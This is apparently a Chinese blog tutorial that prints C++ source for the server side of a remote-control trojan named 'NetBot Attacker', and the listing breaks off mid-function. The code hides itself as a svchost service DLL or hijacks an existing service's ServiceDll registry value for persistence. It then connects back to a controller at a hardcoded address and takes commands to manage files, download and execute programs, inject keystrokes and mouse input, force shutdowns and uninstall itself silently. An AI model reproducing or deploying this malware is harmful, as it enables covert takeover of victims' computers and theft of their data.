Windows服务之前已经进行了讲解,如何在安装Windows服务呢,作为远程控制的服务端。
安装Windows服务代码如下
- #include "stdafx.h"
- //#include <windows.h>
- #include "InstallService.h"
- #include <winsvc.h>
- BOOL StartService(LPCTSTR lpService)
- {
- SC_HANDLE schSCManager;
- SC_HANDLE schService;
- SERVICE_STATUS ServiceStatus;
- DWORD dwErrorCode;
- schSCManager=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//打开服务控制管理器数据库
- if (schSCManager!=NULL)
- {
- schService=::OpenService(schSCManager,lpService,SERVICE_ALL_ACCESS);//获得服务对象的句柄
- if (schService!=NULL)
- {
- //设置服务为自动启动
- ChangeServiceConfig(schService, SERVICE_NO_CHANGE, SERVICE_AUTO_START, SERVICE_NO_CHANGE,
- NULL, NULL, NULL, NULL, NULL, NULL, NULL);
- if(StartService(schService,0,NULL)==0)//已经存在该服务,就启动服务
- {
- dwErrorCode=GetLastError();
- if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
- {
- CloseServiceHandle(schSCManager);
- CloseServiceHandle(schService);
- return true;
- }
- }
- while(QueryServiceStatus(schService,&ServiceStatus)!=0)
- {
- if(ServiceStatus.dwCurrentState==SERVICE_START_PENDING)
- {
- Sleep(100);
- }
- else
- {
- break;
- }
- }
- CloseServiceHandle(schService);
- }
- CloseServiceHandle(schSCManager);
- }
- else
- return FALSE;
- return TRUE;
- }
- BOOL StopService(LPCTSTR lpService)
- {
- SC_HANDLE schSCManager;
- SC_HANDLE schService;
- SERVICE_STATUS RemoveServiceStatus;
- schSCManager=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//打开服务控制管理器数据库
- if (schSCManager!=NULL)
- {
- schService=::OpenService(schSCManager,lpService,SERVICE_ALL_ACCESS);//获得服务对象的句柄
- if (schService!=NULL)
- {
- //设置服务为禁用
- ChangeServiceConfig(schService, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE,
- NULL, NULL, NULL, NULL, NULL, NULL, NULL);
- if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
- {
- if(RemoveServiceStatus.dwCurrentState!=SERVICE_STOPPED)//停止服务
- {
- if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
- {
- while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)
- {
- Sleep(10);
- QueryServiceStatus(schService,&RemoveServiceStatus);
- }
- }
- }
- }
- CloseServiceHandle(schService);
- }
- ::CloseServiceHandle(schSCManager);
- }
- else
- return FALSE;
- return TRUE;
- }
- BOOL ReplaceSvchostService(LPCTSTR lpService,LPCTSTR lpDllPath)
- {
- int rc = 0;
- HKEY hKey = 0;
- BOOL bRet = FALSE;
- char szOpenKey[MAX_PATH];
- try
- {
- //暂停服务
- StopService(lpService);
- //修改dll指向
- ZeroMemory(szOpenKey,sizeof(szOpenKey));
- wsprintf(szOpenKey, "SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters", lpService);
- rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, szOpenKey, 0, KEY_ALL_ACCESS, &hKey);
- if(ERROR_SUCCESS != rc)
throw "";
- rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned
char*)lpDllPath, strlen(lpDllPath)+1);
- SetLastError(rc);
- if(ERROR_SUCCESS != rc)
throw "RegSetValueEx(ServiceDll)";
- //运行服务
- bRet = StartService(lpService);
- }
- catch(char *str)
- {
- if(str && str[0])
- {
- rc = GetLastError();
- }
- }
- RegCloseKey(hKey);
- return bRet;
- }
- BOOL InstallSvchostService(LPCSTR strServiceName,
- LPCSTR strDisplayName,
- LPCSTR strDescription,
- LPCSTR strDllPath)
- {
- int rc = 0;
- HKEY hKey = 0;
- BOOL bRet = FALSE;
- char szOpenKey[MAX_PATH];
- try
- {
- bRet = InstallService(strServiceName,
- strDisplayName,
- strDescription,
- "%SystemRoot%\\System32\\svchost.exe -k krnlsrvc");
//安装服务 - //修改dll指向
- ZeroMemory(szOpenKey,sizeof(szOpenKey));
- wsprintf(szOpenKey, "SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters", strServiceName);
- //rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, szOpenKey, 0, KEY_ALL_ACCESS, &hKey);
- rc = RegCreateKey(HKEY_LOCAL_MACHINE, szOpenKey,&hKey);
- if(ERROR_SUCCESS != rc)
throw "";
- rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned
char*)strDllPath, strlen(strDllPath)+1);
- SetLastError(rc);
- if(ERROR_SUCCESS != rc)
throw "RegSetValueEx(ServiceDll)";
- RegCloseKey(hKey);
- //添加服务名到netsvcs组
- ZeroMemory(szOpenKey,sizeof(szOpenKey));
- strcpy(szOpenKey, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost");
- rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, szOpenKey, 0, KEY_ALL_ACCESS, &hKey);
- if(ERROR_SUCCESS != rc)
throw "RegOpenKeyEx(Svchost)";
- rc = RegSetValueEx(hKey, "krnlsrvc", 0, REG_MULTI_SZ, (unsigned
char*)strServiceName, strlen(strServiceName)+1);
- SetLastError(rc);
- if(ERROR_SUCCESS != rc)
throw "RegSetValueEx(Svchost\\krnlsrvc)";
- RegCloseKey(hKey);
- bRet = StartService(strServiceName);
- }
- catch(char *str)
- {
- if(str && str[0])
- {
- rc = GetLastError();
- }
- }
- RegCloseKey(hKey);
- return bRet;
- }
- BOOL InstallService(LPCSTR strServiceName,
- LPCSTR strDisplayName,
- LPCSTR strDescription,
- LPCSTR strPathName)
- {
- BOOL bRet = FALSE;
- HKEY key=NULL;
- SC_HANDLE svc=NULL, scm=NULL;
- __try
- {
- scm = OpenSCManager(0, 0,SC_MANAGER_ALL_ACCESS);
- if (!scm)
- __leave;
- svc = CreateService(
- scm,
- strServiceName,
- strDisplayName,
- SERVICE_ALL_ACCESS|SERVICE_INTERACTIVE_PROCESS,
- SERVICE_WIN32_OWN_PROCESS,
- SERVICE_AUTO_START,
- SERVICE_ERROR_IGNORE,
- strPathName,
- NULL, NULL, NULL, NULL, NULL);
- if (svc == NULL)
- {
- if (GetLastError() == ERROR_SERVICE_EXISTS)
- {
- svc = OpenService(scm,strServiceName,SERVICE_ALL_ACCESS);
- if (svc==NULL)
- __leave;
- else
- StartService(svc,0, 0);
- }
- }
- char Desc[MAX_PATH];
- wsprintf(Desc,"SYSTEM\\CurrentControlSet\\Services\\%s", strServiceName);
- RegOpenKey(HKEY_LOCAL_MACHINE,Desc,&key);
- RegSetValueEx(key,"Description",0,REG_SZ,(CONST
BYTE*)strDescription,lstrlen(strDescription));
- if (!StartService(svc,0, 0))
- __leave;
- bRet = TRUE;
- }
- __finally
- {
- if (key!=NULL)
- RegCloseKey(key);
- if (svc!=NULL)
- CloseServiceHandle(svc);
- if (scm!=NULL)
- CloseServiceHandle(scm);
- }
- return bRet;
- }
- void UninstallService(LPCTSTR strServiceName)
- {
- SC_HANDLE scm,svc;
- scm=::OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
- if (scm!=NULL)
- {
- svc=::OpenService(scm, strServiceName, SERVICE_ALL_ACCESS);
- if (svc!=NULL)
- {
- ::DeleteService(svc);
- ::CloseServiceHandle(svc);
- }
- ::CloseServiceHandle(scm);
- }
- }
如何实现远程控制的一些列功能呢,键盘,鼠标远程协助,文件上传下载,视频截获,桌面视频截获等等。
请见代码与注释
- #include "stdafx.h"
- #include "svchost.h"
- #include <shlwapi.h>
- #include "../Seu_lib/Functions.h"
- #include "InstallService.h"
- #include "../Seu_lib/zconf.h"
- #include "../Seu_lib/zlib.h"
- #pragma comment(lib,"../Seu_lib/zlib.lib") //图象无损数据压缩使用zlib库函数
- #pragma comment(lib,"shlwapi.lib")
- #pragma comment(linker,"/IGNORE:4078")
- #pragma comment(linker,"/OPT:NOWIN98")
- //#define NETBOT_TEST
- /////////////////////////////////////////////////////////////////////////////////////////////
- struct MODIFY_DATA
- {
- char strIPFile[128];
//ip文件or DNS - char strVersion[16];
//服务端版本 - DWORD dwVipID;
//VIP ID - BOOL bReplace;
//TRUE-替换服务,FALSE-新建服务 - char strSvrName[32];
//服务名称 - char strSvrDisp[100];
//服务显示 - char strSvrDesc[100];
//服务描述 - char ServerAddr[100];
- int ServerPort;
- }modify_data =
- {
- "192.168.1.132:9000",
- "080625",
- 62,
- FALSE,
- "NetBot",
- "NetBot Attacker",
- "NetBot Attacker",
- " ",
- 8080,
- };
- HMODULE g_hDllModule;
- unsigned long resolve(char *host)
- {
- long i;
- struct hostent *he;
- if((i=inet_addr(host))<0)
- if((he=(struct hostent*)gethostbyname(host))==NULL)//if((he=(struct hostent*)Ggethostbyname(host))==NULL)
- return(0);
- else
- return(*(unsigned long *)he->h_addr);
- return(i);
- }
- void GetIpAndPort()
- {
- char html[256];
//获取的网页 - char *point;
//指针 - char port[12];
- memset(html,0,sizeof(html));
- if(strstr(modify_data.strIPFile,"http") == NULL)//不含HTTP,表示是IP/DNS上线
- {
- strcpy(html,"[");
- strcat(html,modify_data.strIPFile);
- strcat(html,"]");
- }
- else
- {
- //获取网页内容
- for(;;)
- {
- lstrcpy(html,strlwr(GetHttpFile(modify_data.strIPFile)));
- if(strstr(html,"[")!=NULL)
- break;
- else
- Sleep(10000);
- }
- }
- //MessageBox(NULL,html,NULL,MB_OK);
- //分离客户端ip和端口
- point=html;
- if(strstr(html,"[")!=NULL)
- {
- point=point+strlen("[");
- }
- if(strstr(point,":")!=NULL)
- {
- memset(modify_data.ServerAddr,0,sizeof(modify_data.ServerAddr));
- strncpy(modify_data.ServerAddr,point,strcspn(point,":"));
- point=point+strcspn(point,":")+1;
- if(strstr(point,"]")!=NULL)
- {
- memset(port,0,sizeof(port));
- strncpy(port,point,strcspn(point,"]"));
- modify_data.ServerPort = atoi(port);
- }
- }
- }
- DWORD _stdcall RuningThread(LPVOID lParam)
- {
- WSADATA lpWSAData;
- WSAStartup(MAKEWORD(2, 2), &lpWSAData);
- while(1)
- {
- GetIpAndPort();
- HANDLE hThread = NULL;
- hThread = CreateThread(NULL,NULL,ConnectThread,NULL,NULL,NULL);
- WaitForSingleObject(hThread, INFINITE);
- CloseHandle(hThread);
- Sleep(10000);
- }
- WSACleanup();
- return 0;
- }
- DWORD _stdcall ConnectThread(LPVOID lParam)
- {
- struct sockaddr_in LocalAddr;
- LocalAddr.sin_family=AF_INET;
- LocalAddr.sin_port=htons(modify_data.ServerPort);
- LocalAddr.sin_addr.S_un.S_addr=resolve(modify_data.ServerAddr);
- //连接的socket
- SOCKET MainSocket = socket(AF_INET, SOCK_STREAM, 0);
- if(connect(MainSocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR)
- return 0;//connect error
- else
- TurnonKeepAlive(MainSocket, 75);
- SysInfo m_SysInfo;
- GetSystemInfo(m_SysInfo);//获取系统信息
- m_SysInfo.iVipID = modify_data.dwVipID;
- m_SysInfo.bVideo = CVideoCap::IsWebCam();
- lstrcpy(m_SysInfo.cVersion, modify_data.strVersion);
- EncryptData((unsigned char *)&m_SysInfo,
sizeof(SysInfo), modify_data.dwVipID);//用产品ID号加密
- //send socket type
- MsgHead msgHead;
- char chBuffer[4096];
- msgHead.dwCmd = SOCKET_CONNECT;//填充消息
- msgHead.dwSize = sizeof(SysInfo);
- memcpy(chBuffer,&m_SysInfo, sizeof(SysInfo));//填充被控端信息
- if( !SendMsg(MainSocket, (char *)&m_SysInfo, &msgHead) )
- {
- closesocket(MainSocket);
- return 1;//send socket type error
- }
- while(1)
- {
- //接收命令
- if(! RecvMsg(MainSocket, (char *)chBuffer, &msgHead))
- {//掉线,错误
- shutdown(MainSocket,0x02);
- closesocket(MainSocket);
- break;
- }
- //解析命令
- switch(msgHead.dwCmd)
- {
- case CMD_FILEMANAGE:
- {
- CreateThread(NULL,NULL,FileManageThread,NULL,NULL,NULL);//开一个文件管理的线程
- }
- break;
- /* case CMD_SCREENSTART:
- {
- //获取上线的socket==DWORD
- DWORD dwSock = msgHead.dwExtend1;
- CreateThread(NULL,NULL,ScreenThread,(LPVOID)dwSock,NULL,NULL); //开一个屏幕传输的线程
- }
- break;
- case CMD_PROCESSSTART:
- {
- CreateThread(NULL,NULL,ProcessThread,NULL,NULL,NULL); //开一个进程管理的线程
- }
- break;
- case CMD_SHELLSTART:
- {
- CreateThread(NULL,NULL,ShellThread,NULL,NULL,NULL); //开一个远程Shell的线程
- }
- break;
- case CMD_VIDEOSTART:
- {
- CreateThread(NULL,NULL,VideoThread,NULL,NULL,NULL); //开一个视频捕捉的线程
- }
- break;
- case CMD_HEARTBEAT://心跳包
- {
- //不处理这里,可以做计数,因为控制端基本也是定时发的
- }
- break;
- case CMD_UNINSTALL://卸载
- {
- shutdown(MainSocket,0x02);
- closesocket(MainSocket);
- lstrcpy(modify_data.strIPFile,"");
- char szDllPath[MAX_PATH],szCmdLine[MAX_PATH];
- GetModuleFileName(g_hDllModule,szDllPath,MAX_PATH);
- MoveFileEx(szDllPath,NULL,MOVEFILE_DELAY_UNTIL_REBOOT);
- wsprintf(szCmdLine, "Rundll32 %s,RundllUninstall", szDllPath);
- WinExec(szCmdLine, SW_HIDE);
- }
- break;
- case CMD_POWEROFF://关机
- {
- SetPrivilege(SE_SHUTDOWN_NAME,TRUE);
- ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0);
- }
- break;
- case CMD_REBOOT://重启
- {
- SetPrivilege(SE_SHUTDOWN_NAME,TRUE);
- ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0);
- }
- break;
- case CMD_LOGOFF://注销
- {
- SetPrivilege(SE_SHUTDOWN_NAME,TRUE);
- ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
- }
- break;
- case CMD_DOWNEXEC://下载执行
- {
- char strUrl[256];
- memset(strUrl, 0, 256);
- lstrcpyn(strUrl, chBuffer,msgHead.dwSize);
- DownExec(strUrl);
- }
- break;
- case CMD_OPENURL://打开网页
- {
- char strUrl[256];
- memset(strUrl, 0, 256);
- lstrcpyn(strUrl, chBuffer,msgHead.dwSize);
- OpenUrl(strUrl);
- }
- break;
- case CMD_CTRLALTDEL:// Ctrl + Alt + del
- {
- }
- break;
- case CMD_KEYDOWN://WM_KEYDOWN
- {
- XScreenXor OpenDesktop;
- int nVirtKey = msgHead.dwExtend1;
- keybd_event((BYTE)nVirtKey,0,0,0);
- }
- break;
- case CMD_KEYUP://WM_KEYUP
- {
- XScreenXor OpenDesktop;
- int nVirtKey = msgHead.dwExtend1;
- keybd_event((BYTE)nVirtKey,0,KEYEVENTF_KEYUP,0);
- }
- break;
- case CMD_MOUSEMOVE://WM_MOUSEMOVE
- {
- XScreenXor OpenDesktop;
- POINT pt;
- pt.x = msgHead.dwExtend1;
- pt.y = msgHead.dwExtend2;
- SetCursorPos(pt.x, pt.y);
- }
- break;
- case CMD_LBUTTONDOWN://WM_LBUTTONDOWN
- {
- XScreenXor OpenDesktop;
- mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);
- }
- break;
- case CMD_LBUTTONUP://WM_LBUTTONUP
- {
- XScreenXor OpenDesktop;
- mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);
- }
- break;
- case CMD_LBUTTONDBLCLK://WM_LBUTTONDBLCLK
- {
- XScreenXor OpenDesktop;
- mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);
- mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);
- mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);
- mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);
- }
- break;
- case CMD_RBUTTONDOWN://WM_RBUTTONDOWN
- {
- XScreenXor OpenDesktop;
- mouse_event(MOUSEEVENTF_RIGHTDOWN,0,0,0,0);
- }
- break;
- case CMD_RBUTTONUP://WM_RBUTTONUP
- {
- XScreenXor OpenDesktop;
- mouse_event(MOUSEEVENTF_RIGHTUP,0,0,0,0);
- }
- break;
- case CMD_RBUTTONDBLCLK://WM_RBUTTONDBLCLK
- {
- XScreenXor OpenDesktop;
- mouse_event(MOUSEEVENTF_RIGHTDOWN,0,0,0,0);
- mouse_event(MOUSEEVENTF_RIGHTUP,0,0,0,0);
- mouse_event(MOUSEEVENTF_RIGHTDOWN,0,0,0,0);
- mouse_event(MOUSEEVENTF_RIGHTUP,0,0,0,0);
- }
- break;
- */
- default:
- break;
- }
- }
- return 10;
- }
- //////////////////////////////////////////////////////////////////////////////////
- //文件管理线程
- DWORD _stdcall FileManageThread(LPVOID lParam)
- {
- struct sockaddr_in LocalAddr;
- LocalAddr.sin_family=AF_INET;
- LocalAddr.sin_port=htons(modify_data.ServerPort);
- LocalAddr.sin_addr.S_un.S_addr=resolve(modify_data.ServerAddr);
- SOCKET FileSocket = socket(AF_INET, SOCK_STREAM, 0);
- if(connect(FileSocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR)
- {
- closesocket(FileSocket);
- return 0;//connect error
- }
- //================================================================================
- MsgHead msgHead;
- char *chBuffer =
new char[1536 * 1024];
//数据交换区 1.5MB - //send socket type
- msgHead.dwCmd = SOCKET_FILEMANAGE;
- msgHead.dwSize = 0;
-